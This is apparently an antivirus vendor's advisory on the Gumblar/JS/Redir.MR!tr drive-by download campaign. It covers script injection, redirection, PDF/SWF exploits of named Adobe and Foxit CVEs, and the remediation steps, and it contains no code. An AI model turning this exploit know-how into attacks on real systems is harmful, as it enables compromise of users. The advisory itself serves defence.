JS/Redir.MR!tr - Released May 15, 2009 - Last Updated Jun 11, 2009
|
Alias/esTroj/JSRedir-R (Sophos) |
Detection Availability
|
Visible SymptomsRedirect to malicious websites. |
Detailed Analysis
JS/Redir.MR!tr is part of a drive-by download exploit that is also known as Gumblar, Zlkon, or GENO, consisting of several stages. In the first stage, an obfuscated script is injected to compromise websites via cross-site scripting.
The obfuscation technique varies from different infections, but mostly decodes to the same malicious URL.
The following domains are known to be used as second stage malware domains as of this writing:
The second stage occurs when internet users visit infected websites. The injected script redirects the web browser to a malicious website that is hosting other malicious downloabable components such as PDF and SWF files. These files contain exploits which eventually download a malicious Win32 executable.
Some notable exploits included target the vulnerabilities in the Collab.collectEmailInfo() (CVE-2007-5659) and util.printf() (CVE-2008-2992) JavaScript methods by passing overly long arguments to the affected functions.
Earlier versions of Foxit Reader was also affected by the same vulnerability
util.printf() (CVE-2008-1104).
It is advisable to update patches for the affected vulnerabilities.
Some reports indicate that this malware may also redirect Google search results.
|
Recommended ActionFortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Patch
- Download and install the following patches:
|
